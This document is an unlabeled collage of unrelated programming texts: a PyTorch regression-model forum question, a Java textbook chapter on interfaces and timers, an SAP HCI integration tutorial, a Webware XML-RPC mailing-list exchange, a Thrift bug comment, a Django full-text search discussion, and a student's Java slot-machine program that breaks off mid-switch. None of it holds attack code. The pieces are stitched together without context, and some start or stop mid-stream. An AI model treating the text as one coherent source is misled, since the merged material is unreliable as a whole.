import torch.nn.functional as F

class RegModel(nn.Module):
    def __init__(self, learn_lm, y_range=[-0.5, 3.5]):
        super(RegModel, self).__init__()
        self.encoder = SentenceEncoder(learn_lm.model.encoder, learn_lm.data.bptt)
        self.y_range = y_range
        layers = [1200, 50, 1]
        ps = [0.12, 0.1]  # I'll add more layers for this part once this starts to work
        self.plc = nn.Sequential(
            nn.Linear(134*64, 1),  # the shape of self.encoder(x) was (64, 134)
                                   # for the first iteration so I used it. Still gives an error.
        )

    def forward(self, x):
        x = self.encoder(x)
        x = self.plc(x)
        x = F.sigmoid(x)
        # scale the sigmoid output into y_range
        x = x * (self.y_range[1] - self.y_range[0]) + self.y_range[0]
        return x

This is my encoder:

LabEncoder(
  (rnn): my_gru(
    (rnn): GRU(50, 50, batch_first=True)
  )
  (encoder): Sequential(
    (0): Embedding(7400, 50)
    (1): my_gru(
      (rnn): GRU(50, 50, batch_first=True)
    )
  )
)

Thanks a lot
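To make the windowing above concrete, here is a torch-free sketch (the helper names are mine) of what SentenceEncoder's forward loop and pad_tensor are doing with plain Python lists:

```python
# Torch-free illustration of SentenceEncoder's mechanics:
# - the forward loop walks the sequence in windows of at most `bptt` tokens,
#   so the last window can be shorter and there is no fixed max_len;
# - pad_tensor right-pads a short batch dimension up to `bs`.
def bptt_windows(sl, bptt):
    """(start, end) slice bounds visited by `for i in range(0, sl, bptt)`."""
    return [(i, min(i + bptt, sl)) for i in range(0, sl, bptt)]

def pad_list(t, bs, val=0):
    """List analog of pad_tensor: extend t with `val` up to length bs."""
    return t + [val] * (bs - len(t)) if len(t) < bs else t

print(bptt_windows(134, 70))  # [(0, 70), (70, 134)]: two chunks, unequal sizes
print(pad_list([5, 9], 4))    # [5, 9, 0, 0]
```

This is why the output length depends on sl rather than being a constant: sequences longer than bptt are processed chunk by chunk and the chunk outputs are concatenated back together.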
https://forums.fast.ai/t/sentenceencoder-lesson-12-ulmfit/69772
- Interfaces
- Object Cloning
- Inner Classes
- Proxies

You have now seen all the basic tools for object-oriented programming in Java. This chapter shows you two advanced techniques that are very commonly used. Despite their less obvious nature, you will need to master them to complete your Java tool chest.

The first, called an interface, is a way of describing what classes should do, without specifying how they should do it. A class can implement one or more interfaces. You can then use objects of these implementing classes anytime that conformance to the interface is required. After we cover interfaces, we take up cloning an object (or deep copying, as it is sometimes called). A clone of an object is a new object that has the same state as the original but a different identity. In particular, you can modify the clone without affecting the original.

Finally, we move on to the mechanism of inner classes. Inner classes are technically somewhat complex: they are defined inside other classes, and their methods can access the fields of the surrounding class. Inner classes are useful when you design collections of cooperating classes. In particular, inner classes are important for writing concise, professional-looking code to handle graphical user interface events.

This chapter concludes with a discussion of proxies, objects that implement arbitrary interfaces. A proxy is a very specialized construct that is useful for building system-level tools. You can safely skip that section on first reading.

Interfaces

In the Java programming language, an interface is not a class but a set of requirements for the classes that want to conform to the interface. For example, the Comparable interface declares a compareTo method: a call x.compareTo(y) compares the two objects and returns an indication of whether x or y is larger. The method is supposed to return a negative number if x is smaller than y, zero if they are equal, and a positive number otherwise. This particular interface has a single method. Some interfaces have more than one method; we will look at them later in some detail.
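Before wiring Comparable into a class of our own, it can help to see the contract on classes that already implement it. A small runnable illustration of my own (not from the book):

```java
// String and Integer already implement Comparable, so the compareTo
// contract can be observed directly. (Raw Comparable, matching the
// pre-generics style used in this chapter.)
public class BuiltinComparables {
    // A negative compareTo result means "x sorts before y".
    static boolean lessThan(Comparable x, Object y) {
        return x.compareTo(y) < 0;
    }

    public static void main(String[] args) {
        System.out.println(lessThan("apple", "banana"));                    // true
        System.out.println(lessThan(Integer.valueOf(7), Integer.valueOf(3))); // false
    }
}
```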
Now suppose we want to use the sort method of the Arrays class to sort an array of Employee objects. Then the Employee class must implement the Comparable interface. To make a class implement an interface, you declare that the class implements the given interface and you supply definitions for all of its methods. In our case, that means supplying a compareTo method that returns -1 if the first employee's salary is less than the second employee's salary, 0 if they are equal, and 1 otherwise.

public int compareTo(Object otherObject)
{  Employee other = (Employee)otherObject;
   if (salary < other.salary) return -1;
   if (salary > other.salary) return 1;
   return 0;
}

NOTE

In the interface declaration, the compareTo method was not declared public because all methods in an interface are automatically public. However, when implementing the interface, you must declare the method as public. Otherwise, the compiler assumes that the method has package visibility, the default for a class. Then the compiler complains that you try to supply a weaker access privilege.

NOTE

The compareTo method of the Comparable interface returns an integer. If the objects are not equal, it does not matter what negative or positive value you return. This flexibility can be useful when comparing integer fields. For example, suppose each employee has a unique integer id, and you want to sort by employee ID number. Then you can simply return id - other.id. That value will be some negative value if the first ID number is less than the other, 0 if they are the same ID, and some positive value otherwise. However, there is one caveat: The range of the integers must be small enough that the subtraction does not overflow. If you know that the IDs are not negative or that their absolute value is at most (Integer.MAX_VALUE - 1) / 2, you are safe. Of course, the subtraction trick doesn't work for floating-point numbers. The difference salary - other.salary can round to 0 if the salaries are close together but not identical.

Now you have seen what a class must do to avail itself of the sorting service. But why can't the Employee class simply provide a compareTo method without declaring that it implements Comparable? The reason is that the Java programming language is strongly typed.
When making a method call, the compiler needs to be able to check that the method actually exists. Somewhere inside the sort method there will be calls to the compareTo method, and the compiler must be able to verify that the objects being sorted actually supply one.

NOTE

You would expect that the sort method in the Arrays class is defined to accept a Comparable[] array, so that the compiler can complain if anyone ever calls sort with an array whose element type doesn't implement the Comparable interface. Sadly, that is not the case. Instead, the sort method accepts an Object[] array and uses a clumsy cast:

// from the standard library--not recommended
if (((Comparable)a[i]).compareTo((Comparable)a[j]) > 0)
{  // rearrange a[i] and a[j]
   . . .
}

If a[i] does not belong to a class that implements the Comparable interface, then the virtual machine throws an exception. (Note that the second cast to Comparable is not necessary because the explicit parameter of the compareTo method has type Object, not Comparable.)

See Example 6-1 for the full code for sorting an employee array.

Example 6-1: EmployeeSortTest.java

import java.util.*;

public class EmployeeSortTest
{  public static void main(String[] args)
   {  Employee[] staff = new Employee[3];

      staff[0] = new Employee("Harry Hacker", 35000);
      staff[1] = new Employee("Carl Cracker", 75000);
      staff[2] = new Employee("Tony Tester", 38000);

      Arrays.sort(staff);

      // print out information about all Employee objects
      for (int i = 0; i < staff.length; i++)
      {  Employee e = staff[i];
         System.out.println("name=" + e.getName()
            + ",salary=" + e.getSalary());
      }
   }
}

class Employee implements Comparable
{  public Employee(String n, double s)
   {  name = n;
      salary = s;
   }

   public String getName()
   {  return name;
   }

   public double getSalary()
   {  return salary;
   }

   public void raiseSalary(double byPercent)
   {  double raise = salary * byPercent / 100;
      salary += raise;
   }

   /**
      Compares employees by salary
      @param otherObject another Employee object
      @return a negative value if this employee has a lower
      salary than otherObject, 0 if the salaries are the same,
      a positive value otherwise
   */
   public int compareTo(Object otherObject)
   {  Employee other = (Employee)otherObject;
      if (salary < other.salary) return -1;
      if (salary > other.salary) return 1;
      return 0;
   }

   private String name;
   private double salary;
}

java.lang.Comparable 1.0

int compareTo(Object otherObject)
compares this object with otherObject and returns a negative integer if this object is less than otherObject, zero if they are equal, and a positive integer otherwise.

NOTE

According to the language standard: "The implementor must ensure sgn(x.compareTo(y)) = -sgn(y.compareTo(x)) for all x and y. (This implies that x.compareTo(y) must throw an exception if y.compareTo(x) throws an exception.)" Here, "sgn" is the sign of a number: sgn(n) is -1 if n is negative, 0 if n equals 0, and 1 if n is positive. In plain English, if you flip the parameters of compareTo, the sign (but not necessarily the actual value) of the result must also flip. That's not a problem, but the implication about exceptions is tricky. Suppose Manager has its own comparison method that compares two managers. It might start like this:

public int compareTo(Object otherObject)
{  Manager other = (Manager)otherObject;
   . . .
}

NOTE

That violates the "antisymmetry" rule. If x is an Employee and y is a Manager, then the call x.compareTo(y) doesn't throw an exception; it simply compares x and y as employees. But the reverse, y.compareTo(x), throws a ClassCastException. The same issue comes up when programming an equals method. However, in that case, you simply test if the two classes are identical, and if they aren't, you know that you should return false. However, if x and y aren't of the same class, it is not clear whether x.compareTo(y) should return a negative or a positive value.
Maybe managers think that they should compare larger than any employee, no matter what the salary. But then they need to explicitly implement that check. If you don't trust the implementors of your subclasses to grasp this subtlety, you can declare compareTo as a final method. Then the problem never arises because subclasses can't supply their own version. Conversely, if you implement a compareTo method of a subclass, you need to provide a thorough test. Here is an example:

if (otherObject instanceof Manager)
{  Manager other = (Manager)otherObject;
   . . .
}
else if (otherObject instanceof Employee)
{  return 1; // managers are always better :-(
}
else return -((Comparable)otherObject).compareTo(this);

java.util.Arrays 1.2

static void sort(Object[] a)
sorts the elements in the array a, using a tuned mergesort algorithm. All elements in the array must belong to classes that implement the Comparable interface, and they must all be comparable to each other.

Properties of Interfaces

Interfaces are not classes. In particular, you can never use the new operator to instantiate an interface:

x = new Comparable(. . .); // ERROR

However, even though you can't construct interface objects, you can still declare interface variables.

Comparable x; // OK

An interface variable must refer to an object of a class that implements the interface:

x = new Employee(. . .); // OK provided Employee implements Comparable

Next, just as you use instanceof to check if an object is of a specific class, you can use instanceof to check if an object implements an interface:

if (anObject instanceof Comparable) { . . . }

NOTE

It is legal to tag interface methods as public, and fields as public static final. Some programmers do that, either out of habit or for greater clarity. However, the Java Language Specification recommends not to supply the redundant keywords, and we follow that recommendation.

While each class can only have one superclass, a class can implement multiple interfaces, for example:

class Employee implements Comparable, Cloneable { . . . }

Then the Employee class enjoys most of the benefits of multiple inheritance while avoiding the complexities and inefficiencies.
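The rules above (interface variables, instanceof with interface types, and one class implementing several interfaces) fit in a single compact program. This is a minimal illustration of my own, not a listing from the book:

```java
// Minimal demo: an interface variable holds any implementing object,
// instanceof works with interface types, and a class can implement
// several interfaces at once. (Raw Comparable, pre-generics style.)
public class InterfaceRules {
    interface Describable { String describe(); }

    static class Employee implements Comparable, Describable {
        double salary;
        Employee(double s) { salary = s; }
        public int compareTo(Object other) {
            double os = ((Employee) other).salary;
            if (salary < os) return -1;
            if (salary > os) return 1;
            return 0;
        }
        public String describe() { return "Employee earning " + salary; }
    }

    public static void main(String[] args) {
        Comparable x = new Employee(35000);           // interface variable
        System.out.println(x instanceof Describable); // true: second interface
        System.out.println(x.compareTo(new Employee(75000))); // -1
    }
}
```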
NOTE

C++ has multiple inheritance and all the complications that come with it, such as virtual base classes, dominance rules, and transverse pointer casts. Few C++ programmers use multiple inheritance, and some say it should never be used. Other programmers recommend using multiple inheritance only for "mix-in" style inheritance. In the mix-in style, a primary base class describes the parent object, and additional base classes (the so-called mix-ins) may supply auxiliary characteristics. That style is similar to a Java class with a single base class and additional interfaces. However, in C++, mix-ins can add default behavior, whereas Java interfaces cannot.

NOTE

Microsoft has long been a proponent of using interfaces instead of using multiple inheritance. In fact, the Java notion of an interface is essentially equivalent to how Microsoft's COM technology uses interfaces. As a result of this unlikely convergence of minds, it is easy to supply tools based on the Java programming language to build COM objects (such as ActiveX controls). This is done (pretty much transparently to the coder) in, for example, Microsoft's J++ product and is also the basis for Sun's JavaBeans-to-ActiveX bridge.

Interfaces and Callbacks

A common pattern in programming is the callback pattern. In this pattern, you want to specify the action that should occur whenever a particular event happens. For example, you may want a particular action to occur when a button is clicked or a menu item is selected. However, since you have not yet seen how to implement user interfaces, we will consider a similar but simpler situation.

The javax.swing package contains a Timer class that is useful if you want to be notified whenever a time interval has elapsed. For example, if a part of your program contains a clock, then you can ask to be notified every second so that you can update the clock face.
When you construct a timer, you set the time interval and you tell it what it should do whenever the time interval has elapsed.

How do you tell the timer what it should do? In many programming languages, you supply the name of a function that the timer should call periodically. However, the classes in the Java standard library take an object-oriented approach. You pass an object of some class. The timer then calls one of the methods on that object. Passing an object is more flexible than passing a function because the object can carry additional information.

Of course, the timer needs to know what method to call. The timer requires that you specify an object of a class that implements the ActionListener interface of the java.awt.event package. Here is that interface:

public interface ActionListener
{  void actionPerformed(ActionEvent event);
}

The timer calls the actionPerformed method when the time interval has expired.

NOTE

As you saw in Chapter 5, Java does have the equivalent of function pointers, namely, Method objects. However, they are difficult to use, slower, and cannot be checked for type safety at compile time. Whenever you would use a function pointer in C++, you should consider using an interface in Java.

Suppose you want to print a message "At the tone, the time is . . .", followed by a beep, once every ten seconds. You need to define a class that implements the ActionListener interface. Then place whatever statements you want to have executed inside the actionPerformed method.

class TimePrinter implements ActionListener
{  public void actionPerformed(ActionEvent event)
   {  Date now = new Date();
      System.out.println("At the tone, the time is " + now);
      Toolkit.getDefaultToolkit().beep();
   }
}

Note the ActionEvent parameter of the actionPerformed method. This parameter gives information about the event, such as the source object that generated it; see Chapter 8 for more information.
However, detail information about the event is not important in this program, and you can safely ignore the parameter.

Next, you construct an object of this class and pass it to the Timer constructor.

ActionListener listener = new TimePrinter();
Timer t = new Timer(10000, listener);

The first parameter of the Timer constructor is the time interval that must elapse between notifications, measured in milliseconds. We want to be notified every ten seconds. The second parameter is the listener object.

Finally, you start the timer.

t.start();

Every ten seconds, a message like

At the tone, the time is Thu Apr 13 23:29:08 PDT 2000

is displayed, followed by a beep.

Example 6-2 puts the timer and its action listener to work. After the timer is started, the program puts up a message dialog and waits for the user to click the Ok button to stop. While the program waits for the user, the current time is displayed in ten-second intervals. Be patient when running the program. The "Quit program?" dialog box appears right away, but the first timer message is displayed after ten seconds.

Note that the program imports the javax.swing.Timer class by name, in addition to importing javax.swing.* and java.util.*. This breaks the ambiguity between javax.swing.Timer and java.util.Timer, an unrelated class for scheduling background tasks.

Example 6-2: TimerTest.java

import java.awt.*;
import java.awt.event.*;
import java.util.*;
import javax.swing.*;
import javax.swing.Timer;
// to resolve conflict with java.util.Timer

public class TimerTest
{
   public static void main(String[] args)
   {
      ActionListener listener = new TimePrinter();

      // construct a timer that calls the listener
      // once every 10 seconds
      Timer t = new Timer(10000, listener);
      t.start();

      JOptionPane.showMessageDialog(null, "Quit program?");
      System.exit(0);
   }
}

class TimePrinter implements ActionListener
{
   public void actionPerformed(ActionEvent event)
   {
      Date now = new Date();
      System.out.println("At the tone, the time is " + now);
      Toolkit.getDefaultToolkit().beep();
   }
}

javax.swing.JOptionPane 1.2

static void showMessageDialog(Component parent, Object message)
displays a dialog box with a message prompt and an Ok button. The dialog is centered over the parent component. If parent is null, the dialog is centered on the screen.

javax.swing.Timer 1.2

Timer(int interval, ActionListener listener)
constructs a timer that notifies listener whenever interval milliseconds have elapsed.

void start()
starts the timer. Once started, the timer calls actionPerformed on its listeners.

void stop()
stops the timer. Once stopped, the timer no longer calls actionPerformed on its listeners.

java.awt.Toolkit 1.0

static Toolkit getDefaultToolkit()
gets the default toolkit. A toolkit contains information about the graphical user interface environment.

void beep()
emits a beep sound.
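The callback machinery of Example 6-2 can be exercised without any GUI classes. Here is a hedged sketch of my own, with made-up names standing in for ActionListener and Timer, so the pattern itself is testable:

```java
// The callback pattern in miniature: a hand-rolled interface stands in for
// ActionListener, and a synchronous "timer" stands in for javax.swing.Timer.
// All names here are mine, not library classes.
public class CallbackSketch {
    interface TickListener { void tick(int n); }

    // Fires the listener once per "interval" -- synchronously, for clarity.
    static void runTimer(int ticks, TickListener listener) {
        for (int n = 1; n <= ticks; n++) listener.tick(n);
    }

    static StringBuilder log = new StringBuilder();

    public static void main(String[] args) {
        // The callback object plays the role of TimePrinter.
        runTimer(3, new TickListener() {
            public void tick(int n) { log.append(n); }
        });
        System.out.println(log); // 123
    }
}
```

The essential point is the same as with Timer: the caller of runTimer decides *what* happens on each tick, while runTimer decides *when* it happens.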
http://www.informit.com/articles/article.aspx?p=31110&amp;seqNum=4
Business scenario – A logistics system is sending Sales Area information to a remote SFTP server via HCI. The message should be sent to the SFTP server only if the Sales Org field has a particular value; otherwise the flow should be terminated.

Intention – To understand the Gateway / Persist / Terminate steps with an asynchronous scenario in HCI (SOAP to SFTP), including the testing and monitoring.

Pre-requisites –

- SOAP UI (version 4.0.1 or later)
- Eclipse with HCI plug-ins
- Tenant ID and access to HCI

Download Eclipse and install the HCI plugins:

Download Eclipse and choose the Windows 64-bit option (based on your OS). On the home page, go to Help and choose 'Install New Software'. Click the Add button, give the HCI update-site URL, and select the 'Hana Cloud Integration' option on the next screen. This completes the installation of the HCI plugins in Eclipse.

Note: The HCI configuration can also be done using the WebUI, apart from this Eclipse option.

Tenant connection: Set up Eclipse with your tenant.

Create the Integration Project and Iflow: We will create the Integration Project which will hold our Iflow. Go to File -> New -> Other and choose SAP Hana Cloud Integration. Select Integration Project and click Next. Then create the Iflow as specified below.

Configure sender and channels: Click on the sender and give a name to the sender system. Select Properties -> Basic Authentication, for the purpose of simplicity.

Import the WSDL: Right-click on "src.main.resources.wsdl" and import the Sales Area WSDL. We will need this in the sender channel config. We will import two WSDLs: one for the source (SalesArea.wsdl) and the other for the target (Sales_Area_tgt.wsdl).

Src WSDL – has 3 fields: SalesOrg / DistrChannel / Division
Tgt WSDL – has 4 fields: SalesOrg / DistrChannel / Division / country. Country will be hardcoded in the mapping.

Sender SOAP channel:

Address: Specify any logical name like /SalesArea. This will be part of the endpoint which will be generated later.
URL to WSDL: click browse and select SalesArea (Src WSDL).

Processing settings:
- Standard – for async scenarios
- Robust – for sync scenarios where the response goes back to the sender.

Mapping: Right click on "src.main.resources.mapping" -> new -> other -> HCI -> message mapping. Select the source and target message in the mapping. Complete the one-to-one mapping and hardcode the country code to 'US'. 'Console' will automatically show any errors upon saving the mapping.

Click on the connection between start and end. Then right click and "Add Message Transformers" -> "Mapping". Then right click and assign the mapping you just created.

Gateway config: The requirement is that the message should go to the receiver only when Sales Org = 'A001'; else it should be terminated without any error / exception. Click on the connection between mapping and end step. Right click "Add Message Routing" -> "Router". Click on the connection between Gateway and End. Click on properties and put a name like 'Salesorg'.

Condition expression: /p1:SalesArea/Salesorg='A001'

Click on "Gateway" and remove "Raise Alert" and "Throw Exception".

End Message: Click on the end message event from the right side and drag it inside the Iflow. Then draw the connector between them. Give the name as "NotSalesOrg" and click on "Default Route".

Check the namespace mapping: Go to "Runtime configuration" and see that the right namespace mapping is shown there.

Message persistence: Click on the line between mapping and gateway and click on message persistence.

Deploy the Iflow: Now right click and deploy your Iflow. The Console shows that the deployment was successful.

WEBUI: You can use the tenant URL to go to the webui -> overview section to monitor / check your Iflows. Click on "All started". You will be able to see the endpoint and the final Iflow. This endpoint should be used in SOAP UI to test.

View Integration flow – will show the final deployed Iflow.
Monitor Message Processing – will be used for monitoring your messages after you test.
Final Iflow:

SOAP UI testing: As you can see here, the endpoint is taken from the webui as previously mentioned. Also specify the HCI user/pwd as 'Basic authentication'. This is an asynchronous scenario and hence no response is seen; only HTTP/1.1 202 Accepted is returned.

Monitoring: Go to the web ui -> click on completed messages. Go to "Message processing log". You can see the message is COMPLETED.

NOTE: This blog does not show the receiver SFTP config as it follows standard steps. The receiver channel and system have been removed from the Iflow.

Solid information. Thanks Tarang.

Excellent step-by-step information. Keep blogging!
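The router condition above can be sanity-checked offline against a sample payload before deploying. This is a minimal sketch, assuming a payload shaped like the SalesArea message described earlier; the namespace URI and the sample values are placeholders, since the real ones come from the imported WSDL and tenant configuration.

```python
import xml.etree.ElementTree as ET

# Hypothetical payload shaped like the SalesArea message; the real
# namespace URI comes from the WSDL, not this placeholder.
payload = """\
<p1:SalesArea xmlns:p1="http://example.com/salesarea">
  <Salesorg>A001</Salesorg>
  <DistrChannel>10</DistrChannel>
  <Division>00</Division>
</p1:SalesArea>"""

root = ET.fromstring(payload)
# Same check the router condition /p1:SalesArea/Salesorg='A001' performs.
routed_to_receiver = (root.findtext("Salesorg") == "A001")
print(routed_to_receiver)  # True -> message continues to the receiver
```

With Salesorg set to anything other than 'A001', the expression is false and the message would take the "NotSalesOrg" default route instead.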
https://blogs.sap.com/2016/08/31/hci-understanding-the-gateway-persist-terminate-function/
Tue, 20 Jul 2004 20:14:27 -0700, na gmane.comp.python.webware, Mark Phillips napisał(a):

> I added a new def of my own to XMLRPCExamples.py and added "import
> os.path" to the top of the file.
>
> def getmydoc(self, filepath):
>     if not os.path.exists(filepath):
>         # the file just ain't there
>         result = "File not found"
>     else:
>         result = "The file is present"
>     return result
>
> Then I repeated the test procedure and included
> >>> server.getmydoc('a valid path')
>
> This produced a fault:
>
> xmlrpclib.Fault: <Fault 1: 'Traceback (most recent call last):\n File
> "WebKit/XMLRPCServlet.py", line 44, in respondToPost\n File
> "WebKit/RPCServlet.py", line 15, in call\nNotImplementedError:
> getmydoc\n'>
...
> What have I overlooked?

Maybe you did not add your method to exposedMethods()?

def exposedMethods(self):
    return ['getmydoc', 'add']

--
JZ

Warning: I have just started with Python 2.3 for MacOS 10.3.4 and Webware 0.8.1. I have installed Webware and started the AppServer. The standard tests work fine.

>>> import xmlrpclib
>>> server = xmlrpclib.Server(' XMLRPCExample')
>>> server.multiply(10,20)

I added a new def of my own to XMLRPCExamples.py and added "import os.path" to the top of the file.

def getmydoc(self, filepath):
    if not os.path.exists(filepath):
        # the file just ain't there
        result = "File not found"
    else:
        result = "The file is present"
    return result

Then I repeated the test procedure and included

>>> server.getmydoc('a valid path')

This produced a fault:

xmlrpclib.Fault: <Fault 1: 'Traceback (most recent call last):\n File "WebKit/XMLRPCServlet.py", line 44, in respondToPost\n File "WebKit/RPCServlet.py", line 15, in call\nNotImplementedError: getmydoc\n'>

I tried reloading the server cache and also stop/restarting the appserver. No joy. I have tried a number of modifications of XMLRPCExample.py and none of them are reflected in the test procedure. It is as if the file is not being interpreted/compiled.
What have I overlooked?

Mark Phillips
Mophilly & Associates
On the web at
On the phone at 619 444-9210

On Jul 21, 2004, at 12:39 AM, JZ wrote:
> Tue, 20 Jul 2004 20:14:27 -0700, na gmane.comp.python.webware, Mark
> Phillips napisał(a):
>
>> What have I overlooked?
>
> Maybe you did not add your method to exposedMethods()?
>
> def exposedMethods(self):
>     return ['getmydoc', 'add']
>
> --
> JZ

That is a good suggestion. The truth is, and I kinda hate to admit this, I didn't realize the file I was editing was not the file being used by AppServer. Sometimes being a Newbie really bytes.
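For anyone reproducing this outside Webware, the same register-before-expose idea can be sketched with the modern standard library's XML-RPC server; registering the function here plays the role of listing it in the servlet's exposedMethods(). The host/port and file path below are illustrative, not from the thread.

```python
import os.path
import threading
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.client import ServerProxy

def getmydoc(filepath):
    # Same body as the servlet method from the thread.
    if not os.path.exists(filepath):
        return "File not found"
    return "The file is present"

# Port 0 lets the OS pick a free port.
server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
# Without this registration the call fails -- the analogue of forgetting
# to list the method in Webware's exposedMethods().
server.register_function(getmydoc)

host, port = server.server_address
worker = threading.Thread(target=server.handle_request)
worker.start()

proxy = ServerProxy(f"http://{host}:{port}")
result = proxy.getmydoc("/")
worker.join()
server.server_close()
print(result)  # prints "The file is present" on a POSIX system
```

Comment out the register_function() line and the same call raises a Fault, which mirrors the NotImplementedError the original poster saw.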
https://sourceforge.net/p/webware/mailman/message/13907196/
ASF GitHub Bot commented on THRIFT-2642:
----------------------------------------

Github user juliengreard commented on a diff in the pull request:

--- Diff: lib/py/src/ext/types.cpp ---
@@ -20,6 +20,8 @@
 #include "ext/types.h"
 #include "ext/protocol.h"
+#include <iostream>
--- End diff --

I usually include built-in libs first

> Recursive structs don't work in python
> --------------------------------------
>
> Key: THRIFT-2642
> URL:
> Project: Thrift
> Issue Type: Bug
> Components: Python - Compiler, Python - Library
> Affects Versions: 0.9.2
> Reporter: Igor Kostenko
> Assignee: Eric Conner
>
> Recursive structs in 0.9.2 work fine in c++ & c#, but not in python, because the generated code tries to use objects which are not constructed yet.
> Struct:
> {code}
> struct Recursive {
>   1: list<Recursive> Children
> }
> {code}
> Python code:
> {code}
> class Recursive:
>   thrift_spec = (
>     None, # 0
>     (1, TType.LIST, 'Children', (TType.STRUCT, (Recursive, Recursive.thrift_spec)), None, ), # 1
>   )
> {code}
> Error message:
> {code}
> Traceback (most recent call last):
>   File "ttypes.py", line 20, in <module>
>     class Recursive:
>   File "ttypes.py", line 28, in Recursive
>     (1, TType.LIST, 'Children', (TType.STRUCT, (Recursive, Recursive.thrift_spec)), None, ), # 1
> NameError: name 'Recursive' is not defined
> {code}

-- This message was sent by Atlassian JIRA (v6.4.14#64029)
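The NameError happens because a class name is not bound until its body finishes executing, so a spec inside the body cannot refer to the class itself. One way generated code can avoid it is to leave the recursive slot unset and patch it in after the class statement. This is a minimal sketch of that idea, with the TType constants replaced by placeholder integers (assumed values, since the real ones come from the Thrift runtime).

```python
# Placeholder stand-ins for thrift's TType constants -- assumed values,
# not the real Thrift runtime.
TTYPE_STRUCT = 12
TTYPE_LIST = 15

class Recursive:
    # Referencing Recursive here would raise NameError, so defer it.
    thrift_spec = None

# Patch the spec in once the name 'Recursive' exists.
Recursive.thrift_spec = (
    None,  # 0
    (1, TTYPE_LIST, 'Children',
     (TTYPE_STRUCT, (Recursive, None)), None,),  # 1
)

# The spec now refers back to the class itself, with no NameError.
assert Recursive.thrift_spec[1][3][1][0] is Recursive
```

The same deferral trick (or a lazy callable in place of the nested spec) is how self-referential generated structures are usually made importable in Python.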
http://mail-archives.apache.org/mod_mbox/thrift-dev/201707.mbox/%3CJIRA.12730761.1406717939000.178319.1499293440487@Atlassian.JIRA%3E
I'm currently trying to build the functionality directly in django's ORM as a cascade of functions that would retrieve matches in decreasing relevance, eg:

class Article(meta.Model):
    title = meta.CharField()
    description = meta.TextField()
    keywords = meta.CharField()

def search(request, term):
    matches = []
    matches.extend(findExactTitle(term))
    matches.extend(findInTitle(term))
    matches.extend(findInKeywords(term))
    matches.extend(findInDescription(term))
    render_to_response('search_results', {'matches': matches})

Any ideas? Suggestions?

I haven't yet had an opportunity to use it myself, but it seems to be what you're looking for.

--
"May the forces of evil become confused on the way to your house." -- George Carlin

At World Online, the search engine (lawrence.com/search, ljworld.com/search) uses swish-e () to index files. We made a small script that reads a custom Django setting (FULL_TEXT_INDEXING) to find out which models need to be indexed. The indexer runs on a regular basis; for each to-be-indexed model, it grabs all items in the system using get_list() (with optional limiting kwargs designated in FULL_TEXT_INDEXING), renders each result in a template according to its content type, and indexes the resulting rendered template. Then, when somebody does a search on the site, we use swish-e's Python bindings to retrieve the IDs of the objects that match the search criteria. Then we use Django's get_in_bulk() to retrieve the actual objects. get_in_bulk() takes a list of IDs and returns a dictionary of {id: object}. (Trivia: get_in_bulk() was created to solve this exact problem.)

Hope that helps! It would be pretty cool to open-source this mini search framework and pop it in django/contrib, but that would be up to Jacob to decide.

Adrian

--
Adrian Holovaty
holovaty.com | djangoproject.com | chicagocrime.org

Jacob

Doesn't Swish-e pose an incompatibility for licensing? Everything Django has been BSD up to this point and I would hate to see anything alter this.
Isn't swish-e gpl?

Regards,
David

> On Dec 29, 2005, at 9:31 AM, Adrian Holovaty wrote:
>> At World Online, the search engine (lawrence.com/search,
>> ljworld.com/search) uses swish-e () to index files.
> [snip]
>> Hope that helps! It would be pretty cool to open-source this mini
>> search framework and pop it in django/contrib, but that would be up to
>> Jacob to decide.

> I'd love to open it up; I don't see any reason that we'd need to keep
> it hidden. I'll put it on my todo list :)
> Jacob

> Doesn't Swish-e pose an incompatibility for licensing? Everything Django
> has been BSD up to this point and I would hate to see anything alter
> this. Isn't swish-e gpl?

> Swish-e grants a special exemption from automatically GPL'ing linked
> programs which use the libswish-e API interface:

Seriously, though, this licensing stuff sucks :(
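One wrinkle in the cascade from the first post: because each finder's results are appended to one list, the same article can appear once per finder. A small hedged helper (my own, not from the thread) that merges the lists in priority order and keeps only the first, most relevant occurrence:

```python
def ranked_unique(*result_lists):
    """Merge result lists in priority order, dropping repeats.

    The first list is assumed to be the most relevant, so each item
    keeps the position of its best match.
    """
    seen = set()
    merged = []
    for results in result_lists:
        for item in results:
            if item not in seen:
                seen.add(item)
                merged.append(item)
    return merged

# e.g. exact-title hits first, then keyword hits:
print(ranked_unique(["a1", "a2"], ["a2", "a3"]))  # ['a1', 'a2', 'a3']
```

The items only need to be hashable; with model instances you would typically dedupe on their primary keys instead.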
http://groups.google.com/group/django-users/browse_thread/thread/6e3bbbe601299588/52ad2857016dc95b%3Flnk=gst&q=search&rnum=2
Ok, so I'm taking a class in Java. I've already turned in this assignment but after doing so I got to thinking about a piece of code that I came up with to solve a problem. I was wondering what better way there might be. As a rule (because the class hasn't learned it, though I know it already) we can't use arrays, which I complained to the teacher about because I think arrays would make the whole assignment easier. Basically, it's a slot machine: 3 slots and 6 symbols (using text to simulate them). At the end I have to count matching slots and pay accordingly. When you see my code you'll see a method that I came up with, but I was wondering if there were an easier way, mainly because I want to scale it up to 5 slots. I can see how I would have to modify my existing code, but I'm not sure if there is an easier way. Here's the entire code:

Code :
package slot.machine;

import java.util.Random;
import java.util.Scanner;

public class SlotMachine {

    public static void main(String[] args) {
        Scanner kb = new Scanner(System.in);
        Random rnd = new Random();
        int rndSlot1, rndSlot2, rndSlot3, betAmnt, matches, multiplier;
        int totalWinning = 0, totalBet = 0, cntPlays = 0;

        do {
            // Let's get the slots first, casino style programming ;)
            // nextInt(6) yields 0-5, one value per symbol
            rndSlot1 = rnd.nextInt(6);
            rndSlot2 = rnd.nextInt(6);
            rndSlot3 = rnd.nextInt(6);

            // Let's (re)set some things
            matches = 0;
            multiplier = 0;

            // Get bet from user
            System.out.print("Please enter bet amount (0 to quit): ");
            betAmnt = kb.nextInt();

            if (betAmnt > 0) // If they want to play...
            {
                cntPlays++; // Number of games played...just for fun.
                totalBet += betAmnt; // Accumulate total bets

                // Display Results
                switch (rndSlot1)
                {
                    case 0: System.out.print("\nCherries "); break;
                    case 1: System.out.print("\nOranges "); break;
                    case 2: System.out.print("\nPlums "); break;
                    case 3: System.out.print("\nBells "); break;
                    case 4: System.out.print("\nMelons "); break;
                    case 5: System.out.print("\nBars "); break;
                    default: // Shouldn't get here...
                        System.out.print("\nTILT! "); // Or "Error!" or something like that
                        break;
                }

                switch (rndSlot2)
                {
                    case 0: System.out.print("Cherries "); break;
                    case 1: System.out.print("Oranges "); break;
